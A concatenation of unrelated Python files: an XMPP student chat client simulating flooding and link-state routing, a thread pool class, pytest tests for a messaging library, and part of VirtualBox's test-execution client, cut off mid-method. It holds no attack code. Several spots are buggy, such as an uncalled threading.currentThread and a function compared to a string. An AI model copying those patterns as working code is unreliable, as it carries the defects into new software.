'emisor': 'R',
'weight': 100,
'nodes': 'none',
'msg': 'msg'
}
class Session(ClientXMPP):
def __init__(self, jid, password, relations, algorithm, name):
ClientXMPP.__init__(self, jid, password)
''' Add all event handlers, nickname and
start reciever in alumnchat '''
self.add_event_handler('session_start', self.session_start)
self.add_event_handler('message', self.message)
self.room = 'alumnos'
self.current_reciever = 'alumchat.xyz'
self.auto_subscribe = True
self.relations = relations
self.algorithm_name = algorithm
self.algorithm = getAlgorithm(algorithm)
self.serial = 1
self.neighbours = getNeighbours(relations, name)
self.graph = Graph()
self.name = name
self.lsps = {}
# Functions sent as arguments to main menu
functions = {
'dc': self.dc_and_exit,
'list': self.get_contacts,
'add': self.add_contact,
'rm': self.delete_account,
'send_message': self.message_sender,
'jc': self.join_conversation,
'find': self.start_algorithm,
'd' : self.direct_message
}
self.menuInstance = Thread(target = menu, args = (functions,))
self.add_event_handler('register', self.register)
def session_start(self, event):
''' Handler for successful connection,
start the menu thread '''
self.send_presence()
self.get_roster()
#Start the graph by adding ourselves and our neighbours
self.graph.addNode(self.name)
for node in self.neighbours:
self.graph.addNode(node)
self.graph.addEdge(self.name, node, self.neighbours[node])
self.start_algorithm({})
self.menuInstance.start()
def start_algorithm(self, args):
''' Where the magic happens, start sending hellos to neighbours
and hope for the best '''
if self.algorithm_name in ('lsr', 'dvr'):
self.send_to_neighbours(generateLSP(self.name, self.neighbours, self.serial), 'start')
self.serial += 1
def dc_and_exit(self, args):
''' Disconect from server and exit the
program
BUG: For some reason after using blessed's
fullscreeen sys.exit() doesn't exit the program correctly '''
self.disconnect(wait=2.0)
sys.exit()
sys.exit()
def message_error(self, msg):
''' Error messages '''
print(term.bold_red('ha ocurrido un error'))
print(msg)
def message(self, msg):
''' Handler for normal messages '''
if msg['type'] in ('chat', 'normal'):
if msg['subject'] in ('flood'):
jmsg = msg['body']
og_msg = json.loads(jmsg)
if og_msg['final_to'] == self.boundjid.jid.split('/')[0]:
if og_msg['og_from'] == mem['emisor'] and og_msg['msg'] == mem['msg']:
if int(og_msg['weight']) < mem['weight']:
mem['weight'] = og_msg['weight']
mem['nodes'] = og_msg['node_list']
else:
print(mem['weight'])
print(mem['nodes'])
print(term.cyan(og_msg['og_from'] +': '+og_msg['msg']))
mem['weight'] = og_msg['weight']
mem['nodes'] = og_msg['node_list']
mem['emisor'] = og_msg['og_from']
mem['msg'] = og_msg['msg']
return 0
elif og_msg['hops'] != 0:
self.resend(og_msg, msg['from'])
elif msg['subject'] in ('start', 'resend'):
resend_message = self.algorithm(self, msg)
self.send_to_neighbours(resend_message, 'resend') if resend_message else None
elif msg['subject'] in ('lsr_message'):
body = json.loads(msg['body'])
path = body['path']
print(path)
if path[-1] == self.name:
print(term.magenta(str(msg['from'])+ ' > ') + term.color(55)(body['msg']))
print('DISTANCIA RECORRIDA:' + term.color(55)(str(body['distance'])))
else:
next_hop = path.index(self.name) + 1
self.send_message(mto = path[next_hop]+'@alumchat.xyz', mbody = msg['body'], msubject = 'lsr_message', mfrom = self.boundjid)
else:
print(term.magenta(str(msg['from'])+ ' > ') + term.color(55)(msg['body']))
def send_to_neighbours(self, message, subject):
for neighbour in self.neighbours:
self.send_message(mto = neighbour+'@alumchat.xyz', mbody = generateLSP(self.name, self.neighbours, self.serial), msubject = subject, mfrom = self.boundjid)
self.send_message(mto = neighbour+'@alumchat.xyz', mbody = message, msubject = subject, mfrom = self.boundjid)
def add_contact(self, contact):
''' Add contact to contact list
TODO: Currently no handling of error when adding user '''
self.send_presence_subscription(pto=contact)
print(term.bold_green(contact + ' es ahora tu contacto'))
def get_contacts(self, args):
''' Print all contacts on contact list '''
print(term.magenta('Users in your contact list: '))
for jid in self.roster[self.jid]:
print(term.cyan(jid))
def join_conversation(self, args):
''' Method used to change the guy we are currently speaking to
returns an error in case that user is not in our contacts list '''
if args in self.roster[self.jid]:
self.current_reciever = args
else:
print(term.bold_red('ERROR: Usuario no en la lista de contactos'))
def message_sender(self, args):
''' Send normal message
TODO: Make it alternate between muc and normal given the conversation context '''
self.send_message(mto=self.current_reciever, mbody=args, msubject='normal message', mfrom=self.boundjid)
def direct_message(self, args):
content = input('Mensaje? ')
if self.algorithm == 'flooding':
body = {
'og_from': str(self.boundjid),
'final_to': args+'@alumchat.xyz',
'hops': 3,
'distance': 0,
'node_list': self.boundjid.jid,
'msg': content,
'weight': 0,
}
#Send Direct Message
for x in self.neighbours:
body['weight'] = self.neighbours[x]
jbody = json.dumps(body)
self.send_message(mto = x+'@alumchat.xyz', mbody = jbody, msubject = 'flood', mfrom = self.boundjid)
elif self.algorithm_name == 'lsr':
path = shortest_path(self.graph, self.name, args.upper())
body = {
'from': self.name,
'to': args+'@alumchat.xyz',
'path': path[1],
'distance': path[0],
'msg': content
}
self.send_message(mto = path[1][1]+'@alumchat.xyz', mbody = json.dumps(body), msubject = 'lsr_message', mfrom = self.boundjid)
else:
self.send_message(mto = args+'@alumchat.xyz', mbody = content, msubject = 'normal chat', mfrom = self.boundjid)
def resend(self, og, sender):
body = {
'og_from': og['og_from'],
'final_to': og['final_to'],
'hops': og['hops'] - 1,
'distance': og['distance'] + 1,
'node_list': og['node_list'] + self.boundjid.jid,
'msg': og['msg'],
'weight': og['weight']
}
for x in self.neighbours:
if x.lower()+'@alumchat.xyz' != str(sender).split('/')[0]:
body['weight'] = body['weight'] + self.neighbours[x]
jbody = json.dumps(body)
self.send_message(mto = x+'@alumchat.xyz', mbody = jbody, msubject = 'flood', mfrom = self.boundjid)
def delete_account(self, args):
''' Helper function to delete account '''
asyncio.run(self.delete_account_send())
async def delete_account_send(self):
# Manual build of delete account iq
resp = self.Iq()
resp['type'] = 'set'
resp['from'] = self.boundjid.jid
resp['register'] = ' '
resp['register']['remove'] = ' '
try:
await resp.send()
print('')
except IqError:
print(term.bold_red('Error al eliminar cuenta'))
except IqTimeout:
print(term.bold_red('timeout'))
self.disconnect()
async def register(self, iq):
''' Register function, calls itself every time.
If your accont already exists it does nothing, if
it is new, it registers you
TODO: Find way to skip this function if your account
already exists '''
resp = self.Iq()
resp['type'] = 'set'
resp['register']['username'] = self.boundjid.user
resp['register']['password'] = self.password
try:
await resp.send()
logging.info('Account created for %s!' % self.boundjid)
except IqError as e:
logging.error('Could not register account: %s' %e.iq['error']['text'])
except IqTimeout:
logging.error('No response from server.')
self.disconnect()
|
thread_pool.py
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
"""
# File : thread_pool.py
# Time :2020/8/19 15:09
# Author :Rodney Cheung
"""
import contextlib
import queue
import threading
StopEvent = object()
class ThreadPool(object):
def __init__(self, max_num, max_task_num=None):
if max_task_num:
self.q = queue.Queue(max_task_num)
else:
self.q = queue.Queue()
self.max_num = max_num
self.cancel = False
self.terminal = False
self.generate_list = []
self.free_list = []
def run(self, func, args, callback=None):
"""
线程池执行一个任务
:param func: 任务函数
:param args: 任务函数所需参数
:param callback: 任务执行失败或成功后执行的回调函数,回调函数有两个参数1、任务函数执行状态;2、任务函数返回值(默认为None,即:不执行回调函数)
:return: 如果线程池已经终止,则返回True否则None
"""
if self.cancel:
return
if len(self.free_list) == 0 and len(self.generate_list) < self.max_num:
self.generate_thread()
w = (
func,
args,
callback,
)
self.q.put(w)
def generate_thread(self):
"""
创建一个线程
"""
t = threading.Thread(target=self.call)
t.start()
def call(self):
"""
循环去获取任务函数并执行任务函数
"""
current_thread = threading.currentThread
self.generate_list.append(current_thread)
event = self.q.get()
while event != StopEvent:
func, arguments, callback = event
try:
result = func(*arguments)
success = True
except Exception:
success = False
result = None
if callback is not None:
try:
callback(success, result)
except Exception:
pass
with self.worker_state(self.free_list, current_thread):
if self.terminal:
event = StopEvent
else:
event = self.q.get()
else:
self.generate_list.remove(current_thread)
def close(self):
"""
执行完所有的任务后,所有线程停止
"""
self.cancel = True
full_size = len(self.generate_list)
while full_size:
self.q.put(StopEvent)
full_size -= 1
def terminate(self):
"""
无论是否还有任务,终止线程
"""
self.terminal = True
while self.generate_list:
self.q.put(StopEvent)
self.q.empty()
def is_busy(self):
return len(self.generate_list) > 0
@contextlib.contextmanager
def worker_state(self, state_list, worker_thread):
"""
用于记录线程中正在等待的线程数
"""
state_list.append(worker_thread)
try:
yield
finally:
state_list.remove(worker_thread)
|
omnibus_test.py
|
import io
import multiprocessing as mp
import sys
import time
import pytest
from omnibus import Sender, Receiver, Message, server
from omnibus.omnibus import OmnibusCommunicator
class TestOmnibus:
@pytest.fixture(autouse=True, scope="class")
def server(self):
# start server
ctx = mp.get_context('spawn') # threadsafe multiprocess method
p = ctx.Process(target=server.server)
p.start()
OmnibusCommunicator.server_ip = "127.0.0.1" # skip discovery
# wait until the server is alive
s = Sender()
r = Receiver("_ALIVE")
while r.recv(1) is None:
s.send("_ALIVE", "_ALIVE")
yield
# stop the server
p.terminate()
p.join()
@pytest.fixture()
def sender(self):
return Sender # for consistency with receiver
@pytest.fixture()
def receiver(self):
def _receiver(*channels):
r = Receiver(*channels)
time.sleep(0.05) # let the receiver connect to the server so messages aren't dropped
return r
return _receiver
def test_nominal(self, sender, receiver):
s = sender()
r = receiver("CHAN")
s.send("CHAN", "A")
assert r.recv(10) == "A"
def test_channels(self, sender, receiver):
s1 = sender()
r1 = receiver("CHAN1")
s2 = sender()
r2 = receiver("CHAN2")
r3 = receiver("CHAN")
s1.send("CHAN1", "A")
assert r1.recv(10) == "A"
assert r3.recv(10) == "A"
assert r2.recv(10) is None
s2.send("CHAN2", "B")
assert r2.recv(10) == "B"
assert r3.recv(10) == "B"
assert r1.recv(10) is None
def test_msg_objects(self, sender, receiver):
s = sender()
r = receiver("CHAN")
s.send_message(Message("CHAN", 10, "PAYLOAD"))
m = r.recv_message(10)
assert m.channel == "CHAN"
assert m.timestamp == 10
assert m.payload == "PAYLOAD"
def test_multi_channel_recieving(self, sender, receiver):
s = sender()
r = receiver("CHAN1", "CHAN2", "CHAN3")
s.send("CHAN1", "A")
assert r.recv(10) == "A"
s.send("CHAN2", "B")
assert r.recv(10) == "B"
s.send("CHAN3", "C")
assert r.recv(10) == "C"
class TestIPBroadcast:
@pytest.fixture()
def broadcaster(self):
ctx = mp.get_context('spawn')
p = ctx.Process(target=server.ip_broadcast)
p.start()
yield
p.terminate()
p.join()
def test_broadcast(self, broadcaster, monkeypatch):
# respond to the IP prompt if discovery times out
monkeypatch.setattr(sys, "stdin", io.StringIO("timeout"))
# make sure the server_ip isn't stored from previous tests
OmnibusCommunicator.server_ip = None
c = OmnibusCommunicator()
assert c.server_ip == server.get_ip()
def test_timeout(self, monkeypatch):
# respond to the IP prompt if discovery times out
monkeypatch.setattr(sys, "stdin", io.StringIO("timeout"))
# make sure the server_ip isn't stored from previous tests
OmnibusCommunicator.server_ip = None
c = OmnibusCommunicator()
assert c.server_ip == "timeout"
|
txsclient.py
|
# -*- coding: utf-8 -*-
# $Id: txsclient.py 70660 2018-01-21 16:18:58Z vboxsync $
# pylint: disable=C0302
"""
Test eXecution Service Client.
"""
__copyright__ = \
"""
Copyright (C) 2010-2017 Oracle Corporation
This file is part of VirtualBox Open Source Edition (OSE), as
available from http://www.virtualbox.org. This file is free software;
you can redistribute it and/or modify it under the terms of the GNU
General Public License (GPL) as published by the Free Software
Foundation, in version 2 as it comes in the "COPYING" file of the
VirtualBox OSE distribution. VirtualBox OSE is distributed in the
hope that it will be useful, but WITHOUT ANY WARRANTY of any kind.
The contents of this file may alternatively be used under the terms
of the Common Development and Distribution License Version 1.0
(CDDL) only, as it comes in the "COPYING.CDDL" file of the
VirtualBox OSE distribution, in which case the provisions of the
CDDL are applicable instead of those of the GPL.
You may elect to license modified versions of this file under the
terms and conditions of either the GPL or the CDDL or both.
"""
__version__ = "$Revision: 70660 $"
# Standard Python imports.
import array;
import errno;
import os;
import select;
import socket;
import sys;
import threading;
import time;
import zlib;
import uuid;
# Validation Kit imports.
from common import utils;
from testdriver import base;
from testdriver import reporter;
from testdriver.base import TdTaskBase;
# Python 3 hacks:
if sys.version_info[0] >= 3:
long = int; # pylint: disable=redefined-builtin,invalid-name
#
# Helpers for decoding data received from the TXS.
# These are used both the Session and Transport classes.
#
def getU32(abData, off):
"""Get a U32 field."""
return abData[off] \
+ abData[off + 1] * 256 \
+ abData[off + 2] * 65536 \
+ abData[off + 3] * 16777216;
def getSZ(abData, off, sDefault = None):
"""
Get a zero-terminated string field.
Returns sDefault if the string is invalid.
"""
cchStr = getSZLen(abData, off);
if cchStr >= 0:
abStr = abData[off:(off + cchStr)];
try:
return abStr.tostring().decode('utf_8');
except:
reporter.errorXcpt('getSZ(,%u)' % (off));
return sDefault;
def getSZLen(abData, off):
"""
Get the length of a zero-terminated string field, in bytes.
Returns -1 if off is beyond the data packet or not properly terminated.
"""
cbData = len(abData);
if off >= cbData:
return -1;
offCur = off;
while abData[offCur] != 0:
offCur = offCur + 1;
if offCur >= cbData:
return -1;
return offCur - off;
def isValidOpcodeEncoding(sOpcode):
"""
Checks if the specified opcode is valid or not.
Returns True on success.
Returns False if it is invalid, details in the log.
"""
sSet1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
sSet2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_ ";
if len(sOpcode) != 8:
reporter.error("invalid opcode length: %s" % (len(sOpcode)));
return False;
for i in range(0, 1):
if sSet1.find(sOpcode[i]) < 0:
reporter.error("invalid opcode char #%u: %s" % (i, sOpcode));
return False;
for i in range(2, 7):
if sSet2.find(sOpcode[i]) < 0:
reporter.error("invalid opcode char #%u: %s" % (i, sOpcode));
return False;
return True;
#
# Helper for encoding data sent to the TXS.
#
def u32ToByteArray(u32):
"""Encodes the u32 value as a little endian byte (B) array."""
return array.array('B', \
( u32 % 256, \
(u32 // 256) % 256, \
(u32 // 65536) % 256, \
(u32 // 16777216) % 256) );
class TransportBase(object):
"""
Base class for the transport layer.
"""
def __init__(self, sCaller):
self.sDbgCreated = '%s: %s' % (utils.getTimePrefix(), sCaller);
self.fDummy = 0;
self.abReadAheadHdr = array.array('B');
def toString(self):
"""
Stringify the instance for logging and debugging.
"""
return '<%s: abReadAheadHdr=%s, sDbgCreated=%s>' % (type(self).__name__, self.abReadAheadHdr, self.sDbgCreated);
def __str__(self):
return self.toString();
def cancelConnect(self):
"""
Cancels any pending connect() call.
Returns None;
"""
return None;
def connect(self, cMsTimeout):
"""
Quietly attempts to connect to the TXS.
Returns True on success.
Returns False on retryable errors (no logging).
Returns None on fatal errors with details in the log.
Override this method, don't call super.
"""
_ = cMsTimeout;
return False;
def disconnect(self, fQuiet = False):
"""
Disconnect from the TXS.
Returns True.
Override this method, don't call super.
"""
_ = fQuiet;
return True;
def sendBytes(self, abBuf, cMsTimeout):
"""
Sends the bytes in the buffer abBuf to the TXS.
Returns True on success.
Returns False on failure and error details in the log.
Override this method, don't call super.
Remarks: len(abBuf) is always a multiple of 16.
"""
_ = abBuf; _ = cMsTimeout;
return False;
def recvBytes(self, cb, cMsTimeout, fNoDataOk):
"""
Receive cb number of bytes from the TXS.
Returns the bytes (array('B')) on success.
Returns None on failure and error details in the log.
Override this method, don't call super.
Remarks: cb is always a multiple of 16.
"""
_ = cb; _ = cMsTimeout; _ = fNoDataOk;
return None;
def isConnectionOk(self):
"""
Checks if the connection is OK.
Returns True if it is.
Returns False if it isn't (caller should call diconnect).
Override this method, don't call super.
"""
return True;
def isRecvPending(self, cMsTimeout = 0):
"""
Checks if there is incoming bytes, optionally waiting cMsTimeout
milliseconds for something to arrive.
Returns True if there is, False if there isn't.
Override this method, don't call super.
"""
_ = cMsTimeout;
return False;
def sendMsgInt(self, sOpcode, cMsTimeout, abPayload = array.array('B')):
"""
Sends a message (opcode + encoded payload).
Returns True on success.
Returns False on failure and error details in the log.
"""
# Fix + check the opcode.
if len(sOpcode) < 2:
reporter.fatal('sendMsgInt: invalid opcode length: %d (\"%s\")' % (len(sOpcode), sOpcode));
return False;
sOpcode = sOpcode.ljust(8);
if not isValidOpcodeEncoding(sOpcode):
reporter.fatal('sendMsgInt: invalid opcode encoding: \"%s\"' % (sOpcode));
return False;
# Start construct the message.
cbMsg = 16 + len(abPayload);
abMsg = array.array('B');
abMsg.extend(u32ToByteArray(cbMsg));
abMsg.extend((0, 0, 0, 0)); # uCrc32
try:
abMsg.extend(array.array('B', \
( ord(sOpcode[0]), \
ord(sOpcode[1]), \
ord(sOpcode[2]), \
ord(sOpcode[3]), \
ord(sOpcode[4]), \
ord(sOpcode[5]), \
ord(sOpcode[6]), \
ord(sOpcode[7]) ) ) );
if abPayload:
abMsg.extend(abPayload);
except:
reporter.fatalXcpt('sendMsgInt: packing problem...');
return False;
# checksum it, padd it and send it off.
uCrc32 = zlib.crc32(abMsg[8:]);
abMsg[4:8] = u32ToByteArray(uCrc32);
while len(abMsg) % 16:
abMsg.append(0);
reporter.log2('sendMsgInt: op=%s len=%d to=%d' % (sOpcode, len(abMsg), cMsTimeout));
return self.sendBytes(abMsg, cMsTimeout);
def recvMsg(self, cMsTimeout, fNoDataOk = False):
"""
Receives a message from the TXS.
Returns the message three-tuple: length, opcode, payload.
Returns (None, None, None) on failure and error details in the log.
"""
# Read the header.
if self.abReadAheadHdr:
assert(len(self.abReadAheadHdr) == 16);
abHdr = self.abReadAheadHdr;
self.abReadAheadHdr = array.array('B');
else:
abHdr = self.recvBytes(16, cMsTimeout, fNoDataOk);
if abHdr is None:
return (None, None, None);
if len(abHdr) != 16:
reporter.fatal('recvBytes(16) returns %d bytes!' % (len(abHdr)));
return (None, None, None);
# Unpack and validate the header.
cbMsg = getU32(abHdr, 0);
uCrc32 = getU32(abHdr, 4);
sOpcode = abHdr[8:16].tostring().decode('ascii');
if cbMsg < 16:
reporter.fatal('recvMsg: message length is out of range: %s (min 16 bytes)' % (cbMsg));
return (None, None, None);
if cbMsg > 1024*1024:
reporter.fatal('recvMsg: message length is out of range: %s (max 1MB)' % (cbMsg));
return (None, None, None);
if not isValidOpcodeEncoding(sOpcode):
reporter.fatal('recvMsg: invalid opcode \"%s\"' % (sOpcode));
return (None, None, None);
# Get the payload (if any), dropping the padding.
abPayload = array.array('B');
if cbMsg > 16:
if cbMsg % 16:
cbPadding = 16 - (cbMsg % 16);
else:
cbPadding = 0;
abPayload = self.recvBytes(cbMsg - 16 + cbPadding, cMsTimeout, False);
if abPayload is None:
self.abReadAheadHdr = abHdr;
if not fNoDataOk :
reporter.log('recvMsg: failed to recv payload bytes!');
return (None, None, None);
while cbPadding > 0:
abPayload.pop();
cbPadding = cbPadding - 1;
# Check the CRC-32.
if uCrc32 != 0:
uActualCrc32 = zlib.crc32(abHdr[8:]);
if cbMsg > 16:
uActualCrc32 = zlib.crc32(abPayload, uActualCrc32);
uActualCrc32 = uActualCrc32 & 0xffffffff;
if uCrc32 != uActualCrc32:
reporter.fatal('recvMsg: crc error: expected %s, got %s' % (hex(uCrc32), hex(uActualCrc32)));
return (None, None, None);
reporter.log2('recvMsg: op=%s len=%d' % (sOpcode, len(abPayload)));
return (cbMsg, sOpcode, abPayload);
def sendMsg(self, sOpcode, cMsTimeout, aoPayload = ()):
"""
Sends a message (opcode + payload tuple).
Returns True on success.
Returns False on failure and error details in the log.
Returns None if you pass the incorrectly typed parameters.
"""
# Encode the payload.
abPayload = array.array('B');
for o in aoPayload:
try:
if utils.isString(o):
if sys.version_info[0] >= 3:
abPayload.extend(o.encode('utf_8'));
else:
# the primitive approach...
sUtf8 = o.encode('utf_8');
for ch in sUtf8:
abPayload.append(ord(ch))
abPayload.append(0);
elif isinstance(o, long):
if o < 0 or o > 0xffffffff:
reporter.fatal('sendMsg: uint32_t payload is out of range: %s' % (hex(o)));
return None;
abPayload.extend(u32ToByteArray(o));
elif isinstance(o, array.array):
abPayload.extend(o);
else:
reporter.fatal('sendMsg: unexpected payload type: %s (%s) (aoPayload=%s)' % (type(o), o, aoPayload));
return None;
except:
reporter.fatalXcpt('sendMsg: screwed up the encoding code...');
return None;
return self.sendMsgInt(sOpcode, cMsTimeout, abPayload);
class Session(TdTaskBase):
"""
A Test eXecution Service (TXS) client session.
"""
def __init__(self, oTransport, cMsTimeout, cMsIdleFudge, fTryConnect = False):
"""
Construct a TXS session.
This starts by connecting to the TXS and will enter the signalled state
when connected or the timeout has been reached.
"""
TdTaskBase.__init__(self, utils.getCallerName());
self.oTransport = oTransport;
self.sStatus = "";
self.cMsTimeout = 0;
self.fErr = True; # Whether to report errors as error.
self.msStart = 0;
self.oThread = None;
self.fnTask = self.taskDummy;
self.aTaskArgs = None;
self.oTaskRc = None;
self.t3oReply = (None, None, None);
self.fScrewedUpMsgState = False;
self.fTryConnect = fTryConnect;
if not self.startTask(cMsTimeout, False, "connecting", self.taskConnect, (cMsIdleFudge,)):
raise base.GenError("startTask failed");
def __del__(self):
"""Make sure to cancel the task when deleted."""
self.cancelTask();
def toString(self):
return '<%s fnTask=%s, aTaskArgs=%s, sStatus=%s, oTaskRc=%s, cMsTimeout=%s,' \
' msStart=%s, fTryConnect=%s, fErr=%s, fScrewedUpMsgState=%s, t3oReply=%s oTransport=%s, oThread=%s>' \
% (TdTaskBase.toString(self), self.fnTask, self.aTaskArgs, self.sStatus, self.oTaskRc, self.cMsTimeout,
self.msStart, self.fTryConnect, self.fErr, self.fScrewedUpMsgState, self.t3oReply, self.oTransport, self.oThread);
def taskDummy(self):
"""Place holder to catch broken state handling."""
raise Exception();
def startTask(self, cMsTimeout, fIgnoreErrors, sStatus, fnTask, aArgs = ()):
"""
Kicks of a new task.
cMsTimeout: The task timeout in milliseconds. Values less than
500 ms will be adjusted to 500 ms. This means it is
OK to use negative value.
sStatus: The task status.
fnTask: The method that'll execute the task.
aArgs: Arguments to pass to fnTask.
Returns True on success, False + error in log on failure.
"""
if not self.cancelTask():
reporter.maybeErr(not fIgnoreErrors, 'txsclient.Session.startTask: failed to cancel previous task.');
return False;
# Change status and make sure we're the
self.lockTask();
if self.sStatus != "":
self.unlockTask();
reporter.maybeErr(not fIgnoreErrors, 'txsclient.Session.startTask: race.');
return False;
self.sStatus = "setup";
self.oTaskRc = None;
self.t3oReply = (None, None, None);
self.resetTaskLocked();
self.unlockTask();
self.cMsTimeout = max(cMsTimeout, 500);
self.fErr = not fIgnoreErrors;
self.fnTask = fnTask;
self.aTaskArgs = aArgs;
self.oThread = threading.Thread(target=self.taskThread, args=(), name=('TXS-%s' % (sStatus)));
self.oThread.setDaemon(True);
self.msStart = base.timestampMilli();
self.lockTask();
self.sStatus = sStatus;
self.unlockTask();
self.oThread.start();
return True;
def cancelTask(self, fSync = True):
"""
Attempts to cancel any pending tasks.
Returns success indicator (True/False).
"""
self.lockTask();
if self.sStatus == "":
self.unlockTask();
return True;
if self.sStatus == "setup":
self.unlockTask();
return False;
if self.sStatus == "cancelled":
self.unlockTask();
return False;
reporter.log('txsclient: cancelling "%s"...' % (self.sStatus));
if self.sStatus == 'connecting':
self.oTransport.cancelConnect();
self.sStatus = "cancelled";
oThread = self.oThread;
self.unlockTask();
if not fSync:
return False;
oThread.join(61.0);
return oThread.isAlive();
def taskThread(self):
"""
The task thread function.
This does some housekeeping activities around the real task method call.
"""
if not self.isCancelled():
try:
fnTask = self.fnTask;
oTaskRc = fnTask(*self.aTaskArgs);
except:
reporter.fatalXcpt('taskThread', 15);
oTaskRc = None;
else:
reporter.log('taskThread: cancelled already');
self.lockTask();
reporter.log('taskThread: signalling task with status "%s", oTaskRc=%s' % (self.sStatus, oTaskRc));
self.oTaskRc = oTaskRc;
self.oThread = None;
self.sStatus = '';
self.signalTaskLocked();
self.unlockTask();
return None;
def isCancelled(self):
"""Internal method for checking if the task has been cancelled."""
self.lockTask();
sStatus = self.sStatus;
self.unlockTask();
if sStatus == "cancelled":
return True;
return False;
def hasTimedOut(self):
"""Internal method for checking if the task has timed out or not."""
cMsLeft = self.getMsLeft();
if cMsLeft <= 0:
return True;
return False;
def getMsLeft(self, cMsMin = 0, cMsMax = -1):
"""Gets the time left until the timeout."""
cMsElapsed = base.timestampMilli() - self.msStart;
if cMsElapsed < 0:
return cMsMin;
cMsLeft = self.cMsTimeout - cMsElapsed;
if cMsLeft <= cMsMin:
return cMsMin;
if cMsLeft > cMsMax and cMsMax > 0:
return cMsMax
return cMsLeft;
def recvReply(self, cMsTimeout = None, fNoDataOk = False):
"""
Wrapper for TransportBase.recvMsg that stashes the response away
so the client can inspect it later on.
"""
if cMsTimeout is None:
cMsTimeout = self.getMsLeft(500);
cbMsg, sOpcode, abPayload = self.oTransport.recvMsg(cMsTimeout, fNoDataOk);
self.lockTask();
self.t3oReply = (cbMsg, sOpcode, abPayload);
self.unlockTask();
return (cbMsg, sOpcode, abPayload);
def recvAck(self, fNoDataOk = False):
"""
Receives an ACK or error response from the TXS.
Returns True on success.
Returns False on timeout or transport error.
Returns (sOpcode, sDetails) tuple on failure. The opcode is stripped
and there are always details of some sort or another.
"""
cbMsg, sOpcode, abPayload = self.recvReply(None, fNoDataOk);
if cbMsg is None:
return False;
sOpcode = sOpcode.strip()
if sOpcode == "ACK":
return True;
return (sOpcode, getSZ(abPayload, 0, sOpcode));
def recvAckLogged(self, sCommand, fNoDataOk = False):
"""
Wrapper for recvAck and logging.
Returns True on success (ACK).
Returns False on time, transport error and errors signalled by TXS.
"""
rc = self.recvAck(fNoDataOk);
if rc is not True and not fNoDataOk:
if rc is False:
reporter.maybeErr(self.fErr, 'recvAckLogged: %s transport error' % (sCommand));
else:
reporter.maybeErr(self.fErr, 'recvAckLogged: %s response was %s: %s' % (sCommand, rc[0], rc[1]));
rc = False;
return rc;
def recvTrueFalse(self, sCommand):
"""
Receives a TRUE/FALSE response from the TXS.
Returns True on TRUE, False on FALSE and None on error/other (logged).
"""
cbMsg, sOpcode, abPayload = self.recvReply();
if cbMsg is None:
reporter.maybeErr(self.fErr, 'recvAckLogged: %s transport error' % (sCommand));
return None;
sOpcode = sOpcode.strip()
if sOpcode == "TRUE":
return True;
if sOpcode == "FALSE":
return False;
reporter.maybeErr(self.fErr, 'recvAckLogged: %s response was %s: %s' % (sCommand, sOpcode, getSZ(abPayload, 0, sOpcode)));
return None;
def sendMsg(self, sOpcode, aoPayload = (), cMsTimeout = None):
"""
Wrapper for TransportBase.sendMsg that inserts the correct timeout.
"""
if cMsTimeout is None:
cMsTimeout = self.getMsLeft(500);
return self.oTransport.sendMsg(sOpcode, cMsTimeout, aoPayload);
def asyncToSync(self, fnAsync, *aArgs):
"""
Wraps an asynchronous task into a synchronous operation.
Returns False on failure, task return status on success.
"""
rc = fnAsync(*aArgs);
if rc is False:
reporter.log2('asyncToSync(%s): returns False (#1)' % (fnAsync));
return rc;
rc = self.waitForTask(self.cMsTimeout + 5000);
if rc is False:
reporter.maybeErrXcpt(self.fErr, 'asyncToSync: waitForTask failed...');
self.cancelTask();
#reporter.log2('asyncToSync(%s): returns False (#2)' % (fnAsync, rc));
return False;
rc = self.getResult();
#reporter.log2('asyncToSync(%s): returns %s' % (fnAsync, rc));
return rc;
#
# Connection tasks.
#
def taskConnect(self, cMsIdleFudge):
"""Tries to connect to the TXS"""
while not self.isCancelled():
reporter.log2('taskConnect: connecting ...');
rc = self.oTransport.connect(self.getMsLeft(500));
if rc is True:
reporter.log('taskConnect: succeeded');
return self.taskGreet(cMsIdleFudge);
if rc is None:
reporter.log2('taskConnect: unable to connect');
return None;
if self.hasTimedOut():
reporter.log2('taskConnect: timed out');
if not self.fTryConnect:
reporter.maybeErr(self.fErr, 'taskConnect: timed out');
return False;
time.sleep(self.getMsLeft(1, 1000) / 1000.0);
if not self.fTryConnect:
reporter.maybeErr(self.fErr, 'taskConnect: cancelled');
return False;
def taskGreet(self, cMsIdleFudge):
"""Greets the TXS"""
rc = self.sendMsg("HOWDY", ());
if rc is True:
rc = self.recvAckLogged("HOWDY", self.fTryConnect);
if rc is True:
while cMsIdleFudge > 0:
cMsIdleFudge -= 1000;
time.sleep(1);
else:
self.oTransport.disconnect(self.fTryConnect);
return rc;
def taskBye(self):
"""Says goodbye to the TXS"""
rc = self.sendMsg("BYE");
if rc is True:
rc = self.recvAckLogged("BYE");
self.oTransport.disconnect();
return rc;
def taskUuid(self):
"""Gets the TXS UUID"""
rc = self.sendMsg("UUID");
if rc is True:
rc = False;
cbMsg, sOpcode, abPayload = self.recvReply();
if cbMsg is not None:
sOpcode = sOpcode.strip()
if sOpcode == "ACK UUID":
sUuid = getSZ(abPayload, 0);
if sUuid is not None:
sUuid = '{%s}' % (sUuid,)
try:
_ = uuid.UUID(sUuid);
rc = sUuid;
except:
reporter.errorXcpt('taskUuid got an invalid UUID string %s' % (sUuid,));
else:
reporter.maybeErr(self.fErr, 'taskUuid did not get a UUID string.');
else:
reporter.maybeErr(self.fErr, 'taskUuid got a bad reply: %s' % (sOpcode,));
else:
reporter.maybeErr(self.fErr, 'taskUuid got 3xNone from recvReply.');
return rc;
#
# Process task
# pylint: disable=C0111
#
def taskExecEx(self, sExecName, fFlags, asArgs, asAddEnv, oStdIn, oStdOut, oStdErr, oTestPipe, sAsUser): # pylint: disable=R0913,R0914,R0915,C0301
# Construct the payload.
aoPayload = [long(fFlags), '%s' % (sExecName), long(len(asArgs))];
for sArg in asArgs:
aoPayload.append('%s' % (sArg));
aoPayload.append(long(len(asAddEnv)));
for sPutEnv in asAddEnv:
aoPayload.append('%s' % (sPutEnv));
for o in (oStdIn, oStdOut, oStdErr, oTestPipe):
if utils.isString(o):
aoPayload.append(o);
elif o is not None:
aoPayload.append('|');
o.uTxsClientCrc32 = zlib.crc32(b'');
else:
aoPayload.append('');
aoPayload.append('%s' % (sAsUser));
aoPayload.append(long(self.cMsTimeout));
# Kick of the EXEC command.
rc = self.sendMsg('EXEC', aoPayload)
if rc is True:
rc = self.recvAckLogged('EXEC');
if rc is True:
